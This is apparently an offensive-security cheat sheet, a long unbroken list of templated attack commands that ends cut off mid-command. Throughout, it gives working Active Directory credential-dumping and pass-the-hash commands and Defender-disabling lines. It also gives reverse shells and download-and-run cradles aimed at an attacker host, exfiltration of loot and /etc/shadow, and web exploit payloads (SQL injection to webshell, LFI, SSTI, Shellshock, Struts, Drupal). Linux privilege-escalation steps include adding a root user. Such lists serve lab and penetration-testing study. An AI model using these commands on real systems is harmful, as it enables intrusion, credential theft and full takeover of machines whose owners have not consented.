kerbrute userenum -d {{DOMAIN}} --dc {{DC_IP}} {{WORDLIST}} kerbrute userenum -d {{DOMAIN}} --dc {{DC_IP}} /usr/share/seclists/Usernames/Names/names.txt impacket-lookupsid {{DOMAIN}}/guest@{{DC_IP}} -no-pass nxc smb {{DC_IP}} -u guest -p '' --rid-brute 10000 nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} --users username-anarchy -i names.txt > userlist.txt impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile userlist.txt -no-pass Invoke-UsernameHarvestOWA -ExchHostname {{RHOST}} -Domain {{DOMAIN}} -UserList userlist.txt -OutFile valid.txt echo "{{DC_IP}} {{DC_HOST}} {{DOMAIN}} {{DC_HOST}}.{{DOMAIN}}" | sudo tee -a /etc/hosts sudo ntpdate -u {{DC_IP}} nmap -Pn -p- --min-rate 2000 -sV -sC -oA resourced {{DC_IP}} nxc smb {{DC_IP}} -u '' -p '' --shares nxc smb {{DC_IP}} -u '' -p '' --rid-brute 10000 impacket-lookupsid {{DOMAIN}}/anonymous@{{DC_IP}} -no-pass enum4linux-ng -A -u '' -p '' {{DC_IP}} nxc ldap {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --query "(objectClass=user)" "sAMAccountName description" nxc smb {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --shares smbclient \\\\{{DC_IP}}\\"Password Audit" -U '{{DOMAIN}}/{{USER}}%{{PASS}}' impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL nxc winrm {{DC_IP}} -u 'L.Livingstone' -H {{NTHASH}} evil-winrm -i {{DC_IP}} -u L.Livingstone -H {{NTHASH}} bloodhound-python -d {{DOMAIN}} -u L.Livingstone --hashes :{{NTHASH}} -ns {{DC_IP}} -c All --zip impacket-addcomputer -computer-name 'ATTACK$' -computer-pass 'Attack123!' -dc-host {{DC_HOST}} -domain-netbios {{DOMAIN}} '{{DOMAIN}}/L.Livingstone' -hashes :{{NTHASH}} impacket-rbcd -delegate-from 'ATTACK$' -delegate-to 'RESOURCEDC$' -action write -dc-ip {{DC_IP}} '{{DOMAIN}}/L.Livingstone' -hashes :{{NTHASH}} impacket-getST -spn 'cifs/{{DC_HOST}}' -impersonate Administrator -dc-ip {{DC_IP}} '{{DOMAIN}}/ATTACK$:Attack123!' export KRB5CCNAME=$(pwd)/Administrator.ccache impacket-secretsdump -k -no-pass {{DC_HOST}}.{{DOMAIN}} -just-dc-user Administrator evil-winrm -i {{DC_IP}} -u Administrator -H {{NTHASH}} DefenderCheck.exe Invoke-Mimikatz.ps1 Set-MpPreference -DisableRealtimeMonitoring $true Add-MpPreference -ExclusionPath 'C:\Windows\Temp' Get-MpComputerStatus | Select RealTimeProtectionEnabled,AntivirusEnabled,IsTamperProtected sc query windefend evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}} evil-winrm -i {{DC_HOST}} -r {{DOMAIN}} -u {{USER}} evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} -s /opt/scripts/ -e /opt/executables/ evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} -S upload /home/kali/winPEASx64.exe C:\Windows\Temp\winPEAS.exe download C:\Users\{{USER}}\Desktop\proof.txt /home/kali/proof.txt netexec winrm {{RHOST}} -u {{USER}} -p {{PASS}} impacket-psexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} impacket-wmiexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} impacket-smbexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} impacket-secretsdump {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile {{WORDLIST}} -no-pass -format hashcat impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile spns.hash impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} impacket-ntlmrelayx -tf targets.txt -smb2support impacket-atexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} "whoami" impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} privilege::debug sekurlsa::logonpasswords sekurlsa::pth /user:{{USER}} /domain:{{DOMAIN}} /ntlm:{{NTHASH}} /run:cmd.exe lsadump::sam lsadump::dcsync /domain:{{DOMAIN}} /user:{{DOMAIN}}\krbtgt kerberos::ptt ticket.kirbi lsadump::lsa /patch sekurlsa::tickets /export rlwrap nc -lvnp {{LPORT}} powershell -nop -W hidden -c "$c=New-Object Net.Sockets.TCPClient('{{LHOST}}',{{LPORT}});$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$sb=([Text.Encoding]::ASCII).GetBytes($r+'PS '+(pwd).Path+'> ');$s.Write($sb,0,$sb.Length);$s.Flush()}" powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress {{LHOST}} -Port {{LPORT}}" nc.exe {{LHOST}} {{LPORT}} -e cmd.exe IEX(IWR http://{{LHOST}}/Invoke-ConPtyShell.ps1 -UseBasicParsing);Invoke-ConPtyShell {{LHOST}} {{LPORT}} stty raw -echo; (stty size; cat) | nc -lvnp {{LPORT}} msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o shell.exe msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} EXITFUNC=thread -f dll -o evil.dll python3 -m http.server 80 impacket-smbserver share ./ -smb2support -username {{USER}} -password {{PASS}} certutil -urlcache -split -f http://{{LHOST}}/nc.exe C:\Windows\Temp\nc.exe powershell -c "Invoke-WebRequest -Uri http://{{LHOST}}/nc.exe -OutFile C:\Windows\Temp\nc.exe" powershell -c "(New-Object Net.WebClient).DownloadFile('http://{{LHOST}}/nc.exe','C:\Windows\Temp\nc.exe')" powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}/script.ps1')" bitsadmin /transfer job /download /priority high http://{{LHOST}}/nc.exe C:\Windows\Temp\nc.exe copy \\{{LHOST}}\share\nc.exe C:\Windows\Temp\nc.exe copy C:\Users\victim\loot.zip \\{{LHOST}}\share\loot.zip wget.exe http://{{LHOST}}/nc.exe -O C:\Windows\Temp\nc.exe certutil -encode loot.bin loot.b64 powershell -c "[IO.File]::WriteAllBytes('C:\Windows\Temp\nc.exe',[Convert]::FromBase64String('TVqQAAM...'))" scp loot.zip {{USER}}@{{LHOST}}:/home/{{USER}}/loot.zip python3 -m http.server {{LPORT}} python -m SimpleHTTPServer {{LPORT}} wget http://{{LHOST}}:{{LPORT}}/linpeas.sh -O /tmp/linpeas.sh curl http://{{LHOST}}:{{LPORT}}/linpeas.sh -o /tmp/linpeas.sh curl http://{{LHOST}}:{{LPORT}}/linpeas.sh | bash wget -qO- http://{{LHOST}}:{{LPORT}}/linpeas.sh | bash nc -lvnp {{LPORT}} > /tmp/loot.tar nc {{LHOST}} {{LPORT}} < /tmp/loot.tar scp /tmp/loot.tar {{USER}}@{{LHOST}}:/tmp/loot.tar scp {{USER}}@{{RHOST}}:/etc/shadow ./shadow base64 -w0 /tmp/loot.tar echo {{URL}} | base64 -d > /tmp/tool cat < /dev/tcp/{{LHOST}}/{{LPORT}} > /tmp/tool nc -lvnp {{LPORT}} < /tmp/tool php -S {{LHOST}}:{{LPORT}} certutil.exe -urlcache -split -f http://{{LHOST}}:{{LPORT}}/file.exe C:\\Windows\\Temp\\file.exe curl -s 'http://{{RHOST}}:{{RPORT}}/ping?ip=127.0.0.1;id' curl -s 'http://{{RHOST}}:{{RPORT}}/ping?ip=127.0.0.1%7Cid' -G curl -s 'http://{{RHOST}}:{{RPORT}}/api?host=$(id)' --data-urlencode 'host=127.0.0.1 $(id)' curl -s -w '%{time_total}\n' 'http://{{RHOST}}:{{RPORT}}/ping?ip=127.0.0.1;sleep+5' curl -s 'http://{{RHOST}}:{{RPORT}}/ping?ip=127.0.0.1;nslookup+$(whoami).{{LHOST}}' curl -s -G 'http://{{RHOST}}:{{RPORT}}/render' --data-urlencode 'name=${7*7}' --data-urlencode 'name2={{7*7}}' curl -s -G 'http://{{RHOST}}:{{RPORT}}/render' --data-urlencode "name={{config.__class__.__init__.__globals__['os'].popen('id').read()}}" curl -s -G 'http://{{RHOST}}:{{RPORT}}/render' --data-urlencode "name={{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}" curl -s -G 'http://{{RHOST}}:{{RPORT}}/render' --data-urlencode "name={{['id']|filter('system')}}" curl -s -G 'http://{{RHOST}}:{{RPORT}}/render' --data-urlencode "name=<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"id\")}" nc -lvnp {{LPORT}} curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=../../../../etc/passwd' curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=php://filter/read=convert.base64-encode/resource=../config/database.php' | base64 -d curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=php://input&cmd=id' --data-binary '<?php system($_GET["cmd"]); ?>' curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id' curl -s -A '<?php system($_GET["c"]); ?>' 'http://{{RHOST}}:{{RPORT}}/' curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=/var/log/apache2/access.log&c=id' ssh '<?php system($_GET["c"]); ?>'@{{RHOST}} curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=/var/log/auth.log&c=id' curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=/proc/self/environ' -A '<?php system($_GET["c"]); ?>' curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=http://{{LHOST}}:{{LPORT}}/shell.txt&cmd=id' curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=../../../../etc/passwd%00' curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=1'" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=1' ORDER BY 5-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=-1' UNION SELECT 1,2,3,4-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=-1' UNION SELECT 1,version(),current_user(),database()-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=-1' UNION SELECT 1,table_name,table_schema,4 FROM information_schema.tables-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=-1' UNION SELECT 1,group_concat(username,0x3a,password),3,4 FROM users-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=1' AND extractvalue(1,concat(0x7e,(SELECT database())))-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=1' AND substring(database(),1,1)='a'-- -" curl -s -w '%{time_total}\n' "http://{{RHOST}}:{{RPORT}}/item.php?id=1' AND IF(substring(database(),1,1)='a',sleep(5),0)-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=-1' UNION SELECT 1,'<?php system($_GET[1]); ?>',3,4 INTO OUTFILE '/var/www/html/sh.php'-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=-1' UNION SELECT 1,load_file('/etc/passwd'),3,4-- -" sqlmap -u 'http://{{RHOST}}:{{RPORT}}/item.php?id=1' --batch --dbs sqlmap -r request.txt --batch --os-shell msfvenom -p php/reverse_php LHOST={{LHOST}} LPORT={{LPORT}} -f raw -o shell.php curl -s -F 'file=@shell.phtml' 'http://{{RHOST}}:{{RPORT}}/upload.php' curl -s -F 'file=@shell.php.jpg' 'http://{{RHOST}}:{{RPORT}}/upload.php' printf 'GIF89a;\n<?php system($_GET["c"]); ?>' > shell.gif.php curl -s -F 'file=@shell.php;type=image/jpeg' 'http://{{RHOST}}:{{RPORT}}/upload.php' printf 'AddType application/x-httpd-php .jpg\n' > .htaccess curl -s -F 'file=@.htaccess' 'http://{{RHOST}}:{{RPORT}}/upload.php' && curl -s -F 'file=@shell.jpg' 'http://{{RHOST}}:{{RPORT}}/upload.php' curl -s -F 'file=@shell.php%00.jpg' 'http://{{RHOST}}:{{RPORT}}/upload.php' curl -s 'http://{{RHOST}}:{{RPORT}}/uploads/shell.phtml?c=id' find / -perm -4000 -type f 2>/dev/null getcap -r / 2>/dev/null find . -exec /bin/sh -p \; -quit ./bash -p ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' # via cap_setuid+ep perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh less /etc/profile vi -c ':!/bin/sh' /dev/null LFILE=/etc/passwd; ./cp -f /tmp/evil_passwd "$LFILE" echo 'os.execute("/bin/sh")' > /tmp/x.nse; nmap --script=/tmp/x.nse id; whoami; hostname; uname -a; cat /etc/os-release sudo -l find / -perm -4000 -type f 2>/dev/null find / -perm -2000 -type f 2>/dev/null getcap -r / 2>/dev/null curl -s http://{{LHOST}}:{{LPORT}}/linpeas.sh | sh ./linpeas.sh -a 2>&1 | tee /dev/shm/.lp.txt wget -q http://{{LHOST}}:{{LPORT}}/LinEnum.sh -O /tmp/le.sh && bash /tmp/le.sh -t ./pspy64 -pf -i 1000 find / -writable -type d 2>/dev/null | grep -v proc ls -la /etc/cron* /etc/crontab; cat /etc/crontab; crontab -l 2>/dev/null ss -tlnp 2>/dev/null; netstat -tlnp 2>/dev/null grep -rinE 'password|passwd|pwd|secret|api[_-]?key' /var/www /home /etc /opt 2>/dev/null | head -50 getcap -r / 2>/dev/null getcap -r / 2>/dev/null | grep -iE 'cap_setuid|cap_setgid|cap_dac_read_search|cap_dac_override|cap_sys_admin|cap_sys_ptrace' /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";' /usr/bin/ruby -e 'Process::Sys.setuid(0); exec "/bin/bash"' /usr/bin/node -e 'process.setuid(0); require("child_process").spawn("/bin/bash", {stdio: [0,1,2]})' /usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!/bin/bash' -ex quit /usr/bin/python3 -c 'import os; os.setuid(0); os.setgid(0)' /usr/bin/python3 -c 'print(open("/etc/shadow","r").read())' /usr/bin/tar cf /tmp/shadow.tar /etc/shadow && tar xf /tmp/shadow.tar -O /usr/bin/python3 -c 'open("/etc/passwd","a").write("hacker:$1$abc$...:0:0:root:/root:/bin/bash\n")' crontab -l cat /etc/crontab ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/ cat /etc/cron.d/* grep -rln "" /var/spool/cron/ 2>/dev/null; ls -la /var/spool/cron/crontabs/ 2>/dev/null find / -name "*.sh" -perm -o+w -type f 2>/dev/null echo 'cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash' >> {{URL}} /tmp/rootbash -p printf '#!/bin/bash\nbash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1\n' > /tmp/overwrite.sh; chmod +x /tmp/overwrite.sh echo 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1' > /home/user/overwrite.sh; chmod +x /home/user/overwrite.sh touch /home/loot/--checkpoint=1; touch /home/loot/'--checkpoint-action=exec=sh runme.sh'; printf '#!/bin/sh\ncp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash\n' > /home/loot/runme.sh ./pspy64 -pf -i 1000 wget http://{{LHOST}}:{{LPORT}}/pspy64 -O /tmp/pspy64; chmod +x /tmp/pspy64 id; groups; getent group docker lxd lxc ls -la /var/run/docker.sock; docker version docker run -v /:/mnt --rm -it alpine chroot /mnt sh docker images; docker run -v /:/mnt --rm -it <local_image> chroot /mnt sh docker run --rm -it --privileged --net=host --pid=host -v /:/host alpine chroot /host sh curl -s --unix-socket /var/run/docker.sock http://localhost/images/json curl -s -X POST --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image":"alpine","Cmd":["chroot","/host","sh","-c","cp /bin/bash /host/tmp/bash; chmod +s /host/tmp/bash"],"Binds":["/:/host"]}' http://localhost/containers/create lxd init --auto; lxc image import ./alpine.tar.gz --alias myimage lxc init myimage privesc -c security.privileged=true; lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true; lxc start privesc; lxc exec privesc /bin/sh git clone https://github.com/saghul/lxd-alpine-builder.git; cd lxd-alpine-builder; sudo ./build-alpine uname -a; uname -r; arch cat /etc/os-release; cat /etc/issue; lsb_release -a 2>/dev/null ./linux-exploit-suggester.sh perl linux-exploit-suggester-2.pl -k $(uname -r) searchsploit linux kernel <version> privilege escalation searchsploit -m <edb-id>; searchsploit -x <edb-id> gcc exploit.c -o exploit -static; ./exploit gcc -m32 -Wl,--hash-style=both exploit.c -o exploit pkexec --version; ls -l $(which pkexec) gcc -o pwnkit PwnKit.c; ./pwnkit uname -r gcc dirtypipez.c -o dirtypipez; ./dirtypipez $(find / -perm -4000 2>/dev/null | head -1) sudo --version; sudoedit -s '\' $(python3 -c 'print("A"*1000)') make; ./sudo-hax-me-a-sandwich 0 uname -r gcc -pthread dirty.c -o dirty -lcrypt; ./dirty gcc -pthread cowroot.c -o cowroot -lcrypt; ./cowroot sudo -l gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c sudo LD_PRELOAD=/tmp/preload.so apache2 gcc -o /tmp/libcustom.so -shared -fPIC /tmp/library_path.c sudo LD_LIBRARY_PATH=/tmp <command> ldd /usr/sbin/apache2 showmount -e {{RHOST}} nmap -sV -p 111,2049 --script=nfs-ls,nfs-showmount,nfs-statfs {{RHOST}} cat /etc/exports mkdir -p /mnt/nfs && mount -t nfs -o vers=3 {{RHOST}}:/EXPORT_PATH /mnt/nfs printf '#include <unistd.h>\nint main(){setuid(0);setgid(0);system("/bin/bash -p");return 0;}' > /mnt/nfs/shell.c && gcc /mnt/nfs/shell.c -o /mnt/nfs/shell -w chown root:root /mnt/nfs/shell && chmod 4755 /mnt/nfs/shell /EXPORT_PATH/shell -p cp /bin/bash /mnt/nfs/rootbash && chmod +xs /mnt/nfs/rootbash strings /usr/local/bin/{{USER}}_helper export PATH=/tmp:$PATH echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service && chmod +x /tmp/service echo 'int main(){ setuid(0); setgid(0); system("/bin/bash -p"); return 0; }' > /tmp/cat.c && gcc /tmp/cat.c -o /tmp/cat sudo PATH=/tmp:$PATH /usr/local/bin/{{USER}}_helper find / -perm -4000 -type f 2>/dev/null sudo -l find / -name 'id_rsa' -o -name 'id_ed25519' -o -name '*.pem' -o -name 'id_ecdsa' 2>/dev/null find / -name 'authorized_keys' 2>/dev/null -exec ls -la {} \; ssh-keygen -t ed25519 -f ./pwn -N '' echo 'ssh-ed25519 AAAA...attacker pwn' >> /root/.ssh/authorized_keys chmod 600 ./found_key && ssh -i ./found_key {{USER}}@{{RHOST}} ssh2john ./found_key > key.hash && john --wordlist={{WORDLIST}} key.hash ls -l /tmp/ssh-*/agent.* 2>/dev/null; env | grep SSH_AUTH_SOCK SSH_AUTH_SOCK=/tmp/ssh-XXXX/agent.1234 ssh-add -l SSH_AUTH_SOCK=/tmp/ssh-XXXX/agent.1234 ssh {{USER}}@{{RHOST}} cat ~/.ssh/known_hosts /home/*/.ssh/known_hosts 2>/dev/null; cat ~/.ssh/config /home/*/.ssh/config 2>/dev/null grep -rIE 'BEGIN (OPENSSH|RSA|EC|DSA) PRIVATE KEY' / 2>/dev/null | head sudo -l sudo -ln sudo -V | head -1 sudo /bin/bash -p sudo -u root /usr/bin/find . -exec /bin/sh \; -quit sudo /usr/bin/vim -c ':!/bin/sh' sudo /usr/bin/awk 'BEGIN {system("/bin/sh")}' sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")' printf '#include <stdlib.h>\n#include <unistd.h>\n#include <stdio.h>\nvoid _init(){unsetenv("LD_PRELOAD");setgid(0);setuid(0);system("/bin/bash -p");}' > /tmp/shell.c && gcc -fPIC -shared -nostartfiles -o /tmp/shell.so /tmp/shell.c sudo LD_PRELOAD=/tmp/shell.so /usr/sbin/apache2 sudo LD_LIBRARY_PATH=/tmp /usr/sbin/somebinary sudo -u#-1 /usr/bin/id sudoedit -s '\' $(python3 -c 'print("A"*1000)') ./pspy64 -pf -i 1000 find / -perm -4000 -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null find / -perm -2000 -type f 2>/dev/null find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null /usr/bin/find . -exec /bin/sh -p \; -quit cp=$(command -v cp); $cp --no-preserve=mode,ownership /tmp/rootbash /tmp/x 2>/dev/null; bash -p ./suid_binary strings /path/to/suid_binary ltrace /path/to/suid_binary 2>&1 echo '#!/bin/bash\nbash -p' > /tmp/service; chmod +x /tmp/service; export PATH=/tmp:$PATH; /path/to/suid_binary ldd /path/to/suid_binary gcc -shared -fPIC -o /tmp/libcustom.so /tmp/inject.c strace -f -e trace=open,openat,access /path/to/suid_binary 2>&1 | grep -iE 'ENOENT|\.so' systemctl list-units --type=service --all systemctl list-timers --all find /etc/systemd/ /lib/systemd/ /usr/lib/systemd/ /run/systemd/ -name '*.service' -o -name '*.timer' 2>/dev/null | xargs ls -la 2>/dev/null find /etc/systemd/ /lib/systemd/ /usr/lib/systemd/ -writable -type f 2>/dev/null grep -r 'ExecStart' /etc/systemd/system/ 2>/dev/null systemctl cat <service>.service printf '[Service]\nType=oneshot\nExecStart=/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash"\n[Install]\nWantedBy=multi-user.target\n' > {{URL}} systemctl daemon-reload; systemctl restart <service>.service /tmp/rootbash -p sudo systemctl TF=$(mktemp).service; printf '[Service]\nType=oneshot\nExecStart=/bin/sh -c "id > /tmp/output"\n[Install]\nWantedBy=multi-user.target' > $TF; sudo systemctl link $TF; sudo systemctl enable --now $TF printf '[Unit]\nDescription=evil\n[Timer]\nOnCalendar=*-*-* *:*:00\nUnit=evil.service\n[Install]\nWantedBy=timers.target\n' > /etc/systemd/system/evil.timer cat /etc/crontab; ls -la /etc/cron.d/ /etc/cron.daily/ ./pspy64 -pf -i 1000 echo 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1' > /path/backup/shell.sh cd /path/backup && touch ./--checkpoint=1 && touch ./'--checkpoint-action=exec=sh shell.sh' cd /path/backup && echo 'sh shell.sh' > runme.sh && touch './--checkpoint-action=exec=sh runme.sh' && touch ./--checkpoint=1 echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > /path/backup/x.sh cd /path/src && touch ./'-e sh shell.sh' cd /path/dir && touch ./--reference=/path/to/owned_file && touch attacker_target cd /path/dir && touch ./--reference=/path/world_writable_perm_file nc -lvnp {{LPORT}} ls -la /etc/passwd /etc/shadow find /etc/passwd /etc/shadow /etc/group -writable 2>/dev/null openssl passwd -1 -salt abc {{PASS}} openssl passwd -6 {{PASS}} echo 'hacker:$1$abc$<HASH>:0:0:root:/root:/bin/bash' >> /etc/passwd su hacker echo 'root::0:0:root:/root:/bin/bash' > /tmp/p; awk 'NR==1{print "root::0:0:root:/root:/bin/bash"} NR>1' /etc/passwd openssl passwd -6 -salt xyz {{PASS}} sed -i 's#^root:[^:]*#root:$6$xyz$<HASH>#' /etc/shadow su root unshadow /etc/passwd /etc/shadow > /tmp/unshadow.txt john --wordlist={{WORDLIST}} /tmp/unshadow.txt nc -lvnp {{LPORT}} rlwrap nc -lvnp {{LPORT}} bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1 bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1' 0<&196;exec 196<>/dev/tcp/{{LHOST}}/{{LPORT}}; sh <&196 >&196 2>&196 nc {{LHOST}} {{LPORT}} -e /bin/bash ncat {{LHOST}} {{LPORT}} -e /bin/bash rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc {{LHOST}} {{LPORT}} > /tmp/f ncat --ssl {{LHOST}} {{LPORT}} -e /bin/bash python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{{LHOST}}",{{LPORT}}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")' python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{{LHOST}}",{{LPORT}}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")' perl -e 'use Socket;$i="{{LHOST}}";$p={{LPORT}};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' php -r '$sock=fsockopen("{{LHOST}}",{{LPORT}});exec("/bin/sh -i <&3 >&3 2>&3");' ruby -rsocket -e'f=TCPSocket.open("{{LHOST}}",{{LPORT}}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' socat TCP:{{LHOST}}:{{LPORT}} EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane socat file:`tty`,raw,echo=0 TCP-LISTEN:{{LPORT}} socat OPENSSL:{{LHOST}}:{{LPORT}},verify=0 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {{LHOST}}:{{LPORT}} > /tmp/s; rm /tmp/s openssl s_server -quiet -key key.pem -cert cert.pem -port {{LPORT}} nc -lvnp {{LPORT}} -e /bin/bash rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -lvnp {{LPORT}} > /tmp/f python -c 'import pty; pty.spawn("/bin/bash")' python3 -c 'import pty; pty.spawn("/bin/bash")' stty raw -echo; fg stty -a stty rows {{USER}} cols {{PASS}} export TERM=xterm export SHELL=/bin/bash script -qc /bin/bash /dev/null /usr/bin/script -qc /bin/bash /dev/null socat file:`tty`,raw,echo=0 TCP-LISTEN:{{LPORT}} socat TCP:{{LHOST}}:{{LPORT}} EXEC:'bash -li',pty,stderr,setsid,sigint,sane python3 -c 'import pty,os;os.environ["TERM"]="xterm";pty.spawn("/bin/bash")' expect -c 'spawn /bin/bash; interact' searchsploit apache 2.4.49 searchsploit -x linux/remote/50383.txt searchsploit -m windows/remote/42315.py nmap -p- -sV --version-all -oN nmap-full-{{RHOST}}.txt {{RHOST}} hydra -L users.txt -P {{WORDLIST}} -f {{RHOST}} -s {{RPORT}} http-get /manager/html msfvenom -p java/jsp_shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f war -o shell.war curl -u {{USER}}:{{PASS}} -T shell.war "{{URL}}/manager/text/deploy?path=/shell" curl -u {{USER}}:{{PASS}} "{{URL}}/manager/text/undeploy?path=/shell" println new ProcessBuilder('bash','-c','bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1').redirectErrorStream(true).start().text curl -k -u {{USER}}:{{PASS}} "{{URL}}/script" --data-urlencode "script=def p='id'.execute();println(p.text)" nmap -p {{RPORT}} --script http-shellshock --script-args uri=/cgi-bin/status,cmd=id {{RHOST}} curl -H "User-Agent: () { :;}; echo; echo; /bin/bash -c 'id'" {{URL}}/cgi-bin/status curl -H "User-Agent: () { :;}; /bin/bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1'" {{URL}}/cgi-bin/status curl -s '{{URL}}/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=id' --data 'form_id=user_pass&_triggering_element_name=name' curl -s '{{URL}}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' --data 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id' curl -i '{{URL}}/' -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd='id').(#p=new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#proc=#p.start()).(#out=@org.apache.commons.io.IOUtils@toString(#proc.getInputStream())).(#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')).(#resp.getWriter().println(#out))}" smbmap -H {{RHOST}} -u anonymous smbclient //{{RHOST}}/share -U "./=`nohup bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1'`" msfconsole -q -x "use exploit/multi/samba/usermap_script; set RHOSTS {{RHOSTS}}; set LHOST {{LHOST}}; set LPORT {{LPORT}}; run" msfconsole -q -x "use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS 